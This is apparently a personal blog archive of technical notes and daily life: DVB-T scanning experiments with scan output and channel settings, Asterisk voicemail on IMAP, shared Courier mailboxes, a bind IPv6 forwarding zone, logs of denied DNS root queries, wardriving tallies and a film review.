In verband met de nog ietwat lastige ribben en het vervelende weer was ik vanmorgen met de auto. Helaas vond de politie het nodig om op een van de drukste plekken op de route een uitgebreide controle te houden tijdens de ochtendspits: op de Sartreweg was in zuidelijke richting maar 1 rijbaan beschikbaar waardoor het verkeer enorm vastliep op de Kardinaal de Jongweg en de Biltse Rading, kaart op OpenStreetMap. Zo'n controle heb ik wel eens vaker gezien op dinsdag, ik gok dat er een verband is met de automarkt. Alleen is het knap vervelend dat de vertraging in de ochtendspits enorm toeneemt door zo'n controle.

I used the recumbent bicycle today to get to work. After the little snowboarding mishap I used the car last week but today I wanted to bicycle again as Dutch traffic is busy and I miss the exercise when I'm not bicycling. I did notice I do use muscles in the bruised area when bicycling: especially making speed was a bit painfull.

Another scan of the vhf/uhf spectrum in Brunssum, and this time I got lucky and found the VRT dvb-t bouquet at 506 MHz (UHF 25) from Genk. With scan:

scanning /usr/share/doc/dvb-utils/examples/scan/dvb-t/be-Genk
using '/dev/dvb/adapter0/frontend0' and '/dev/dvb/adapter0/demux0'
initial transponder 506000000 0 1 9 3 1 3 0
>>> tune to: 506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE
0x0000 0x1090: pmt_pid 0x1090 VRT -- Klara continuo (running)
0x0000 0x1080: pmt_pid 0x1080 VRT -- MNM (running)
0x0000 0x1070: pmt_pid 0x1070 VRT -- Studio Brussel (running)
0x0000 0x1060: pmt_pid 0x1060 VRT -- Klara (running)
0x0000 0x1040: pmt_pid 0x1040 VRT -- Radio 1 (running)
0x0000 0x1050: pmt_pid 0x1050 VRT -- Radio 2 (running)
0x0000 0x1010: pmt_pid 0x1010 VRT -- EEN (running)
0x0000 0x1020: pmt_pid 0x1020 VRT -- Canvas/Ketnet (running)
0x0000 0x10b0: pmt_pid 0x10b0 VRT -- Canvas+/Ketnet+ (running)
0x0000 0x10a0: pmt_pid 0x10a0 VRT -- Sporza (running)
0x0000 0x10c0: pmt_pid 0x10c0 VRT -- Nieuws+ (running)
0x0000 0x10d0: pmt_pid 0x10d0 VRT -- MNM hits (running)
Network Name 'VRTmux1'
>>> tune to: 482000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_1_2:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE
WARNING: >>> tuning failed!!!
>>> tune to: 482000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_1_2:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE (tuning failed)
WARNING: >>> tuning failed!!!
dumping lists (12 services)
Klara continuo:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4241:4240
MNM:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4225:4224
Studio Brussel:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4209:4208
Klara:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4193:4192
Radio 1:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4161:4160
Radio 2:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4177:4176
EEN:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:4113:4114:4112
Canvas/Ketnet:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:4129:4130:4128
Canvas+/Ketnet+:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:4273:4274:4272
Sporza:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4257:4256
Nieuws+:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4289:4288
MNM hits:506000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE:0:4305:4304

In the evening reception was ok, during the day lots of errors. I guess an outside antenna with preamp could make this usable. I updated the DVB experiments with the new data. This brings the total listing of free-to-air services found in this place to 24 television and 24 radio stations. The tuning to 482 MHz is because that is the other VRTmux1 frequency.

High level of friday afternoon in this one: Microsoft research came up with songsmith software and 'promotes' it with a very very cheesy video (notice the brand of the laptop?). Songsmith is software to add music to signing. What people started doing is taking voice tracks from existing music and letting songsmith add new music, leading to the most interesting ways to make you cringe: We Will Rock You - Queen versus Songsmith, "Beat It" by Michael Jackson, and a metal rickroll just to be sure.

More people considered programmig twitter, and thinkgeek sells a device to make your plants send a twitter message when they need water.

Ok, the imap storage for asterisk voicemail works like the proverbial charm. I needed some work on the home dialplan and setup before I could test it, but I was able to leave a message to the home mailbox, seeing it stored in the voicemail imap box and retrieve and delete it using a telephone connected to the ISDN port accessing the VoicemailMain application. The access number for voicemail is now set to 0140-1233 to (sort of) stay in line with the Dutch numbering plan. There is no customer-service at 0140-1200 planned...

Ok, got that bit fixed too: asterisk uses imap as storage backend for voicemail. In modules.conf:

noload => app_voicemail_odbc.so
noload => app_voicemail.so
load => app_voicemail_imap.so

This is with the ubuntu package recompiled to use misdn, so the selection of voicemail storage is a question of which .so to load. In voicemail.conf :

[general]
imapserver=koos.idefix.net
imapfolder=INBOX.calls

[default]
9911 => 19999,House mailbox,,,Tz=european|imapuser=housemail|imappassword=S3cr1t

Now voicemail is saved only on the imap-server, so I can view it with Thunderbird. Or use the asterisk voicemail application to retrieve and delete it. That bit is not tested yet. After all the testing of drivers including heavy torture it's now time to set up a dialplan for the home pbx. Rule 1 of playing with the phones at home is that normal dialing still has to work so my wife can call the numbers without having to dial '0' for an outside line or other tricks, and that the phone in the living room rings when a call comes in. So I have to set up a 'number plan' which allows for special things but also makes all normal numbers work as they should. Solution: I use the 0140 area code, which is reserved (in the Netherlands) for test-numbers for the telecom provider. I am my own telecom provider so I can divert 0140 and do stuff with it, like provide voicemail or internal dialing.

IMAP can do great things, but more advanced things always seem half-documented and lots of searching. I tried to set up shared mailboxes. At home I want a shared mailbox for the voicemails from Asterisk so Mirjam and I can both check the imap inbox, listen to messages and delete them when they are not interesting anymore. Ideally I'd like asterisk to use IMAP as backend storage so we can still access the voicemail over the phone and deleting the voicemail via the phone menu is the same as deleting it from the imap server with a mail client (that's almost something like unified communications!). The next nicest option is to have the voicemails mailed to the shared voicemail mailbox. Still working on getting that fixed. Anyway, setting up the shared mailbox in courier is a bit vague. Not all documentation agrees, but finally the right answer is in /usr/share/doc/courier-base/README.sharedfolders.txt.gz how to set up a server shared mailbox via the shared mailbox index file set as IMAP_SHAREDINDEXFILE in /etc/courier/imapd. A lot of fiddling with rights was needed: by default shared mailbox users can't do anything with it. A light sprinkling of chmod 770 and chgrp voicemail fixed that. The last bit is that the imap server needs to know which other users have full access, using maildiracl to set this up. All now works and we can both read and delete mails. The shared box shows up as #shared.voicemail.calls next to the normal Inbox and Inbox.Sent.

Next needed was shared mailboxes at work so all members of the system group can see the mailboxes where cronjobs from all systems dump their stuff. I never got the same 'system shared mailbox' to work as at home so I decided to go for the 'filesystem shared mailbox' which is set up by creating a file shared-maildirs in your imap directory. That file just lists an alias and a base directory for the mailboxes to access. Rights on the shared boxes still need to be very open which is not my idea of a safe system. But that works, so everybody can see the 'postmaster', 'ups' and other boxes where system mail ends up and delete it when it is not an error message. Those shared boxes show up as shared.systeemgroep.ups and shared.systeemgroep.postmaster in Thunderbird and mutt (haven't checked other clients yet).

Back from snowboarding holiday in .. Samoëns, France. Yes, the same village as last year. The village, the Grand Massif ski area and especially the Viking Lodge apartment were so good we had to get back. I had fun snowboarding although I bruised a few ribs in a fall I had Wednesday on the Cascade piste: it turned icy and I lost balance and fell on my frontside.

I have a twitter. Somebody invited me for reasons I don't know but I thought "why not". It is so inviting to hook this up to some scripts so I can auto-process homepage updates or other automated scripts. Or hook it up to some sort of ticket system at work (probably on a separate account) so our users can follow our network changes.

The latest attacks: loads and loads of queries for the root nameservers, which gives amplification in resolvers with not completely perfect configurations (a complete list of root nameservers) and the same amount of traffic for resolvers which are completely closed to resolving for the outside world. These are probably an attempt to flood an IP using faked queries. Samples:

Jan 19 06:41:04 greenblatt named[6377]: client 69.50.142.110#53930: query (cache) './NS/IN' denied
Jan 19 06:41:13 greenblatt named[6377]: client 69.50.142.110#15557: query (cache) './NS/IN' denied
Jan 20 16:31:47 greenblatt named[6377]: client 66.230.160.1#32412: query (cache) './NS/IN' denied
Jan 20 16:31:59 greenblatt named[6377]: client 66.230.160.1#8478: query (cache) './NS/IN' denied

Already noted at sans: DNS queries for "." isc handler's dairy where the active IPs are listed. And suddenly I see in the logs:

Jan 20 08:36:13 greenblatt named[6377]: client 208.37.177.62#46265: query (cache) './NS/IN' denied
Jan 20 11:50:48 greenblatt named[6377]: client 208.37.177.62#46265: query (cache) './NS/IN' denied

I noticed that IP doing weird DNS stuff before. So 'being attacked' is the right conclusion.

Wardriving results 29 December - 19 January: 1915 new networks with GPS locations according to WiGLE. No planned wardrives but I did bring the wardriving box on some trips to places I hadn't visited in a while, so new networks popped up.

Hard to find and expensive, but we found it at work: the kvm switch that actually works. For us, that is. A environment of almost all x86 hardware with a mix of Linux and Windows as operating system.

Our older kvm switches either had no idea about this 'network' thing or (the Avocent Switchview IP) an approximation: the only working network client was the activex component served by its own webserver. Handy when you're at home using some ssh forwards and without internet explorer (or windows). No access. The 'about' box on that stuff said it was based on vnc but no vnc client could work with it.

But now we found the Adderview CATx IP. Cat-5 cable from the video + keyboard + mouse (usb) adapter to the adderview. And any recent vnc client will work with it, even over portforwarding via ssh links. The only downside is that the outgoing vga and keyboard connectors are on the back of the unit so it's a bit of a nuisance to plug in the 'crash-cart' (a table with wheels with a screen, keyboard and mouse on it) we use. Fixed this by using vga and usb extension cable.

I watched Wargames: The Dead Code (2008) this weekend. I'm not the movie reviewing type, but for this time I'll write something reviewish.
Why? The original: WarGames (1983). It must be the movie that influenced me most. It got me more interested in computers, taught me about modems, which led to BBSes, which led to Internet. I must have seen the original Wargames at least 30 times, if not more. Once in a movie theatre (probably in 1983/1984) but years later I taped it from TV and that tape was wearing out by the time I bought it on vhs tape and a few years later I bought the DVD.
This (Wargames, the dead code) is a weak remake. The original may not be a cinematographic masterpiece but this one has a lot less of a story. They try to build a number of parallels with the original but on some occasions that starts to look quite artificial.
At the end the big storyline is the same: big computer tries to take over US air defense and is about to cause total annihilation, hacker kid makes the computer think again by running a high number of simulations and finding out the best strategic move is not to play.
Transplantation from the 1980s to 2008 was done ok: cold war threat and parents that were unaware of their kids situation because of two jobs were replaced by terrorism threat, a father gone under suspicious circumstances and a single working mom. A lot of the 'the computer is watching you' stuff seemed to me right from 'Enemy of the state'.
I really missed a high-ranking officer saying "I'd piss on a sparkplug if it would do any good!"

Interesting how conditions change, compared to the DX scan from yesterday Digitenne Bouquet 1 at 618 MHz (with Radio/TV Noord-Holland) is fine again and Mobile TV at 658 MHz is fine. Yesterday bouquet 1 had a very high error rate and 658 MHz did not show up at all. All with just w_scan. I think the location of the antenna is the key to these differences, centimeters movement make a lot of difference for certain frequencies.

Interesting DX conditions: A dvb-t scan using w_scan gives me Mobile-TV at 570 MHz and Digitenne bouquet 2 at 826 MHz easy (no tzap and dvbsnoop, just a simple scan).

New DX score: Digitenne bouquet 1 with Omroep Brabant at 546 MHz. Weak, but enough Service Descriptor Table was caught by dvbsnoop that I saw it. Transmitters of that bouquet are all over Brabant. I updated the DVB experiments overview with information on how I scan for signals and how I identify transmitters.

Barry Bouwsma, one of those people who have a measurable positive influence on clue-levels, explains to the linux-dvb mailing list how dvb-t uses single frequency networks (with multiple transmitters on the same frequency) and how receivers can cope with it. Now I understand how that works.

I've heard rumours about it before, but full details have been published now about the IPv6-powered TV network NTT uses in Japan. Actual working IPv6 multicast is used for broadcast channels. Set-top boxes make access to this easy and probably hide all those technical details from the viewer. Via NTT details IPv6-powered TV service (Networkworld).

I noticed some funny stuff on the maps plotted at the weather map site. Non-fitting temperatures like 28°C in the south of the Netherlands where it is -4°C to -8°C according to the people who know. Or 5°C at site 'EHDV' which was plotted somewhere in the eastern part of the country, near Marknesse, but the reading for Marknesse was not the same.

The first error was caused by the recent upgrade at home: Ubuntu comes with Geo::METAR 1.14. I did not notice this right away because they did fix the error about only accepting metar data from the USA. So I put in my own Geo::METAR which fixes the parsing. The other error was that EHDV was in the wrong location in my data. Searching using google found that EHDV is the code for oil platform D15-FA-1 which is also hard to find, but somewhere deep in the data history of air traffic control the Netherlands is the right location out on the North Sea. Where it is indeed a lot warmer than in the east of the country, thanks to less cold wind from the east and more warm wather from the Gulf stream.

Een mooi beeld vanmorgen toen ik even op het dak was om de aansluitingen van de schotel goed aan te draaien: door het koude weer was er een aardige laag rijp op de schotel neergeslagen.

Op het werk hebben we een satellietschotel geinstalleerd. Vandaar mijn interesse in voeten voor schotels een tijdje geleden: de schotel staat op een plat dak. Er is gekozen voor de canal digitaal triplesat set met Philips DSR 7121 HD satelliet ontvanger, dit wordt zo als pakket aangeboden door Canal Digitaal en satelliet dealers. HD televisie is het onderwerp van onderzoek.
Deze ontvanger is duidelijk in dienst van Canal Digitaal en niet van de eigenaar. Zonder smartcard weigert het apparaat totaal. En de kanaalnummering is wat er in de folder van Canaal Digitaal staat waarbij hooguit te zien is aan de zenderomschrijving of het signaal van Astra 19.2, 23.5 of 28.2 komt. De gebruiker heeft daar geen invloed op, die kan favorietenlijsten aanmaken.
Ik miste zonder meer alle 'ik weet het beter' knoppen: zo besloot de ontvanger dat als er een 16:9 TV aan hangt dat 4:3 beeld altijd uitgerekt moet worden. Ook hadden we enorm moeite met richten van de schotel omdat we daar geen ervaring mee hebben. Maar na richten met behulp van een satfinder bleef de ontvanger aangeven dat er geen signaal was, waarbij de kans dus aanwezig was dat de eerste LNB wel naar een satelliet gericht was maar niet naar de goede en het afstemmen dus niet lukte. Met een andere ontvanger lukte het wel en zagen we dat de schotel naar de goede satelliet gericht was, dus de ontvanger was duidelijk de 'schuldige'. Na een paar reboots zag deze ineens wel signaal. Pas dan kun je ook verder met deze ontvanger, zolang er geen signaal gevonden is mag je niets. Maar ook nadat een en ander ging werken en er twee software updates waren bleven de opties tot instellen heel beperkt en dan ook nog in lastige menu's. Een ander audio-kanaal kiezen is al lastig. En technische informatie is ook ver zoeken, met veel moeite is er achter te komen wat signaalsterkte en error rate zijn. Aantal bits in de data-stream van het kanaal of verdere technische informatie is niet op te vragen.
Ik weet nu heel zeker dat als ik ooit aan de satelliet ontvangst ga dat ik dan een ontvanger wil waar ik een stuk meer over te zeggen heb middels 'ik weet het beter' knopjes en die meer wil vertellen over technische details.

Url doing the rounds: TV radar. I am really interested whether there is any UK agency to complain to about this and whether the same problem would occur with Freeview UK (DVB-T based TV). According to the theory of DVB-T it can deal with multipathing a lot better. Sounds like an ideal place to test this theory.

At work we tried to run iscsi on a server. Two network interfaces, one for outside network, one for storage. The iscsi target was on the storage network behind eth1 and kept giving weird errors, which showed in the syslog like:

Jan  6 16:43:54 fokke iscsid: Could not bind connection 0 to eth1 
Jan  6 16:43:54 fokke iscsid: cannot make a connection to 172.16.0.3:3260 (1)
Jan  6 16:48:16 fokke iscsid: iSCSI logger with pid=21827 started!
Jan  6 16:48:17 fokke iscsid: transport class version 2.0-724. iscsid version 2.0-868
Jan  6 16:48:17 fokke iscsid: iSCSI daemon with pid=21828 started!
Jan  6 16:48:17 fokke iscsid: send fail Connection refused
Jan  6 16:48:37 fokke iscsid: Could not bind connection 0 to eth1 
Jan  6 16:48:37 fokke iscsid: cannot make a connection to 172.16.0.3:3260 (1)

The culprit? SELinux. Disabling SELinux completely made iscsid function normally and log in to the storage system and our configured volume show up. It seems SELinux gets in the way a lot of times, I usually have to disable it on systems.

Cold weather here in the Netherlands (at least for us).

Just seen in the ntp stats: A peak of 3271 packets/second of ntp traffic on ntp.cs.uu.nl.

Good to very good radio conditions at the moment. I just picked the following out of the air in the attic:

tune to: 674000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_AUTO:FEC_AUTO:QAM_AUTO:TRANSMISSION_MODE_8K:GUARD_INTERVAL_AUTO:HIERARCHY_NONE
Network Name 'WDR D'
0x0000 0x0064: pmt_pid 0x1330 ARD -- MDR S-Anhalt (running)
0x0000 0x0081: pmt_pid 0x1320 ARD -- NDR FS NDS * (running)
0x0000 0x00e2: pmt_pid 0x1340 ARD -- SWR Fernsehen RP (running)
0x0000 0x0104: pmt_pid 0x1310 ARD -- WDR Düsseldorf (running)
0x0000 0x0109: pmt_pid 0x1350 ARD -- WDR Wuppertal * (running)
0x0000 0x010b: pmt_pid 0x1360 ARD -- WDR Duisburg (running)

Totally unviewable due to all the errors, but the service list is correct. This should be the transmitter in Wesel, Germany at 113 Kilometer distance. Later on I realized how special this was: several hours later there wasn't even a hint of signal on 674 MHz. This was probably due to tropopsheric ducting, I saw an active area forecasted on William Hepburn's tropospheric ducting forecasts from roughly the center of the Netherlands going to the east.

I also saw Dutch Mobile-TV at 522 MHz (Utrecht), 530 MHz (several locations, weak signal), 570 MHz (several locations), 658 MHz (Lelystad).

I took the plunge and migrated from the old homeserver gosper to the new homeserver greenblatt. The physical migration was several hours of de-installing and installing hardware in the big tower case. Most software came up as planned, some minor nits to fix after stuff started running. Most statistics were only fixed after I got things running again, but the assorted sensors at home are available again.

Happy new year! Our cable-tv signal dropped completely last evening of 2008 at 23:10. I guess some fireworks may have taken it out. So we watched the rest of the evenings TV using the dvb-t stick and the laptop. I called the cable-company this morning and reported the malfunction. Several neighbours I asked in the street are also without cable-tv signal.
Later in the afternoon the signal came back.

A complete scan at the highest point in the house gives me several more instances of Digitenne signals. As mentioned before, at 618 MHz Digitenne bouquet 1 with TV Noord-Holland, but also at 786 MHz and 826 MHz bouquet 2. These can come from a number of locations, I can only find out with a directional antenna. Due to the way several stations broadcast exactly the same program at the same frequency there is no way of knowing which station is transmitting it. The fact that the signals have to be exactly the same to avoid interference means there can be no identifying bits somewhere within the dvb datatream. I think it is way cool that transmitter technology is this far that we can transmit the same signal from different locations without interfering with eachother. It is probably the robustness against multipath interference that makes this possible: having more transmitters with the same signal is a form of multipath interference. DVB experiments page updated with these latest experiences.

In browsing some other stuff I found that FM / TV DX-ing is a genuine hobby for some people: trying to receive remote FM / TV stations using good antennas and using special receiving conditions when the signal gets scattered way beyond their normal reach. Thomas Tepe does this and reports about FM / TV receiving conditions on his blog (German). There even is a UKW/TV-Arbeitskreis interested in this subject in the German DX club. They publish complete overviews of transmitters in Germany, Austria, France, the Netherlands, Belgium, Luxembourg and Denmark (german). Their listing of the rtbf dvb-t bouquet matches my experiences with the Belgium Liege transmitter which is a nice plus for me.

Op 13 December had ik een bijzondere kans: als onderdeel van de afscheids activiteiten van vliegbasis Soesterberg organiseerde Vaarwel Vliegbasis Soesterberg een hardloopwedstrijd. Een vriend van ons ging hardlopen, en ik nam de unieke kans waar om eens te fotograferen op vliegbasis Soesterberg. Normaal natuurlijk zwaar verboden wegens militair terrein en actieve vliegbewegingen maar nu kon ik gewoon overal rondlopen met camera. Het was wel koud, en dat kwam goed hard aan op de open vlakte daar. Uiteindelijk een aantal mooie foto's kunnen maken: Startbaanrun 13 December 2008 Vliegbasis Soesterberg - Foto's Koos van den Hout

I tried w_scan again, this time in the highest possible place in the house where I can give the little antenna of the dvb-t stick an outside view. And suddenly 618 MHz is usable and gives me (among other services):

0x0000 0x0450: pmt_pid 0x0000 Digitenne -- TV Noord-Holland (running)
0x0000 0x0457: pmt_pid 0x0000 Digitenne -- Radio Noord-Holland (running)

Some bit errors, but usable signal.

Wardriving results 10 - 28 December: 2959 new networks with GPS locations. The box went along on a few cycling and car trips. I made number 16 in the WiGLE stats without seeing it coming: I was focused on getting 17th place again that I did not notice number 16 being somewhat close.

Christmas: time to visit the family in the south of the Netherlands, and a chance to scan the local tv-spectrum for valid DVB-T signals. German transmitters at 514 MHz: ZDF, 706 MHz: ARD and 602 MHz: ARD regional stations. Germany also seems to have a commercial DVB-T provider at 722 MHz offering several channels with some form of encryption. At 834 MHz I found the rtbf service from Walloon Belgium. It is nice to see how foreign DVB-T transmitters offer local channels.

In hopping between w_scan, scan and tzap to feed dvbsnoop data I found that w_scan leaves 'AUTO' in the channel list and in the generated channels.conf when not updated from the network information table. But, tzap can't parse 'AUTO' entries in channels.conf.

Looking at the network information tables with dvbsnoop shows interesting differences between countries. The Netherlands (Digitenne) shows alternate frequencies, Germany shows alternate frequencies with gps locations of transmitters (for mobile applications?) and Belgium admits you found rtbf.

Going further on the scanning for DVB-T channels I found w_scan, an automatic full-band scanner for DVB-T and DVB-C. The page is in German, but the application itself speaks enough English. This program finds all active DVB-T transmitters and fetches their network information table. On a test run in Utrecht I get:

# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 498000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 522000000 8MHz 2/3 1/2 QPSK 8k 1/4 NONE
T 618000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 706000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 762000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 818000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO

During frequency scanning it even finds a transmitter at 618 MHz (UHF channel 39) but it can't find any valid data there. At 522 MHz (UHF channel 27) is the DVB-H service marketed as 'Mobile TV' in the Netherlands.

In geen jaren gezien: "Even geduld alstublieft" op televisie. Vanavond was er een storing op Nederland 1, 2 en 3. Berichtgeving: Korte storing bij televisiezenders (nos.nl), Korte storing bij televisiezenders. Screenshots: Nederland 2 Even Geduld Alstublieft, Nederland 3 Even geduld alstublieft. Handig, zo'n dvb-stick en de screenshots optie in mplayer.

I installed the Windows drivers and applications that Hauppauge included with the Nova-T stick to see what they 'know' about dvb-t reception. The application itself never showed what the DVB reception details are. I can see channel number or frequency, but nothing like modulation, guard rate, forward error correcting rate or pid. I eventually found out the WinTV application stores all channel data in a databasefile hcwChanDB_5.mdb but serious browsing of that file using mdbtools shows that the program IDs are listed but those settings aren't. I guess the DVB-T receiver in WinTV is really good at detecting those settings from the TPS (Transmission Parameters Signalling). The only things listed are the frequency and the service_id which is indeed the same as the service number which I can see using scan from dvb-utils.

Searching for the same functionality in Linux did not yield much until I browsed the linux-dvb mailinglist archives. I found that 'AUTO' is a valid setting for a lot of the values for scan. Trying that with the known frequencies does indeed give good results, so I can use that as an option when I can't find the right settings when scanning for German and Belgian dvb-t transmitters.

Google is doing more experiments with IPv6. They now offer the option to selected ISPs to return AAAA records for queries coming in via IPv6. XS4ALL being advanced and always interested in new technologies is participating in this program. But: you have to resolve completely via IPv6 to get an IPv6 address. So I fiddled a little with the setup of bind to use the XS4ALL ipv6 resolver for queries regarding google:

zone "google.com" {
    type forward;
    forward first;
    forwarders {
        2001:888:0:6::66;
        2001:888:0:9::99;
    };
};

And now I get the cool answer:

koos@greenblatt:~$ host www.google.com
www.google.com is an alias for www.l.google.com.
www.l.google.com has address 74.125.77.147
www.l.google.com has address 74.125.77.99
www.l.google.com has address 74.125.77.104
www.l.google.com has address 74.125.77.103
www.l.google.com has IPv6 address 2001:4860:0:1001::68

And the IPv6 instance of google will for example give me IPv6 cache links.

I found out why the two transmitters at 762 and 498 MHz weren't received correctly: I had the forward error correction rate wrong. And I guess scan from dvb-utils doesn't fetch those values from the network information table yet. Updating the table to the correct values:

# Digitenne (Utrecht / Maarssen / Lopik / Amersfoort, The Netherlands)
# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 706000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE  # UHF 50
T 818000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE  # UHF 64
T 762000000 8MHz 2/3 NONE QAM64 8k 1/4 NONE  # UHF 57
T 498000000 8MHz 2/3 NONE QAM64 8k 1/4 NONE  # UHF 24
T 522000000 8MHz 2/3 NONE QPSK 8k 1/4 NONE   # DVB-H: UHF 27

Makes scan find everything, including the 'Mobile TV' services on the DVB-H frequency. DVB-H (Handheld) isn't that different from DVB-T I guess. I found the correct values after a good look at the Radio en TV zenders in Nederland site and its DVB-T and DVB-H listings.

This experience should help me understand scanning for German and Belgian transmitters when I try it in Limburg.

Update : tried it again with only listing the first transmitter, this has the weird effect that the other frequency with the same code rate (818 MHz) is always found and that 762 MHz is sometimes found and 498 MHz never on several tries. I guess scan does try to receive the network information table but does not receive it in full. With dvbshoop -nph 0x10 I do see a nice network table with several frequencies I saw scan try:

            DVB-DescriptorTag: 90 (0x5a)  [= terrestrial_delivery_system_descriptor]
            descriptor_length: 11 (0x0b)
            Center frequency: 0x03412140 (= 546000.000 kHz)
            Bandwidth: 0 (0x00)  [= 8 MHz]
            priority: 1 (0x01)  [= HP (high priority) or Non-hierarch.]
            Time_Slicing_indicator: 1 (0x01)  [= Time Slicing is not used.)]
            MPE-FEC_indicator: 1 (0x01)  [= MPE-FEC is not used.)]
            reserved_1: 3 (0x03)
            Constellation: 2 (0x02)  [= 64-QAM]
            Hierarchy information: 0 (0x00)  [= non-hierarchical (native interleaver)]
            Code_rate_HP_stream: 0 (0x00)  [= 1/2]
            Code_rate_LP_stream: 0 (0x00)  [= 1/2]
            Guard_interval: 3 (0x03)  [= 1/4]
            Transmission_mode: 1 (0x01)  [= 8k mode]
            Other_frequency_flag: 1 (0x01)
            reserved_2: 4294967295 (0xffffffff)

            DVB-DescriptorTag: 98 (0x62)  [= frequency_list_descriptor]
            descriptor_length: 33 (0x21)
            reserved_1: 63 (0x3f)
            coding_type: 3 (0x03)  [= terrestrial]
               Centre_frequency: 0334ec40  (= 538000.000 kHz)
               Centre_frequency: 0371f540  (= 578000.000 kHz)
               Centre_frequency: 03f83c40  (= 666000.000 kHz)
               Centre_frequency: 041cdb40  (= 690000.000 kHz)
               Centre_frequency: 04724e40  (= 746000.000 kHz)
               Centre_frequency: 04af5740  (= 786000.000 kHz)
               Centre_frequency: 04e02b40  (= 818000.000 kHz)
               Centre_frequency: 04ec6040  (= 826000.000 kHz)

Hmm, here are the frequencies I missed:

            DVB-DescriptorTag: 90 (0x5a)  [= terrestrial_delivery_system_descriptor]
            descriptor_length: 11 (0x0b)
            Center frequency: 0x02ebae40 (= 490000.000 kHz)
            Bandwidth: 0 (0x00)  [= 8 MHz]
            priority: 1 (0x01)  [= HP (high priority) or Non-hierarch.]
            Time_Slicing_indicator: 1 (0x01)  [= Time Slicing is not used.)]
            MPE-FEC_indicator: 1 (0x01)  [= MPE-FEC is not used.)]
            reserved_1: 3 (0x03)
            Constellation: 2 (0x02)  [= 64-QAM]
            Hierarchy information: 0 (0x00)  [= non-hierarchical (native interleaver)]
            Code_rate_HP_stream: 1 (0x01)  [= 2/3]
            Code_rate_LP_stream: 0 (0x00)  [= 1/2]
            Guard_interval: 3 (0x03)  [= 1/4]
            Transmission_mode: 1 (0x01)  [= 8k mode]
            Other_frequency_flag: 1 (0x01)
            reserved_2: 4294967295 (0xffffffff)

            DVB-DescriptorTag: 98 (0x62)  [= frequency_list_descriptor]
            descriptor_length: 33 (0x21)
            reserved_1: 63 (0x3f)
            coding_type: 3 (0x03)  [= terrestrial]
               Centre_frequency: 02f7e340  (= 498000.000 kHz)
               Centre_frequency: 0334ec40  (= 538000.000 kHz)
               Centre_frequency: 034d5640  (= 554000.000 kHz)
               Centre_frequency: 0371f540  (= 578000.000 kHz)
               Centre_frequency: 03969440  (= 602000.000 kHz)
               Centre_frequency: 04661940  (= 738000.000 kHz)
               Centre_frequency: 048ab840  (= 762000.000 kHz)
               Centre_frequency: 0496ed40  (= 770000.000 kHz)

But: it takes a while before I see these. Maybe scan is a bit impatient and misses bits of the network information table in this specific case. This is all very theoretical as these frequencies only have scrambled services anyway. But I was too curious why this wasn't working as expected.

Bits! Image! Sound! .. the dvb-t stick works. Really plug and play, I just plugged it in and Ubuntu Linux recognized it and loaded the correct driver. To start the tuning process I had to give it an initial frequency and settings which I stored in /usr/share/doc/dvb-utils/examples/scan/dvb-t/nl-Utrecht:

# Digitenne (Utrecht / Maarssen / Lopik / Amersfoort, The Netherlands)
# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 706000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE

That's enough to start the tuning process, the rest of the frequencies is found automatically:

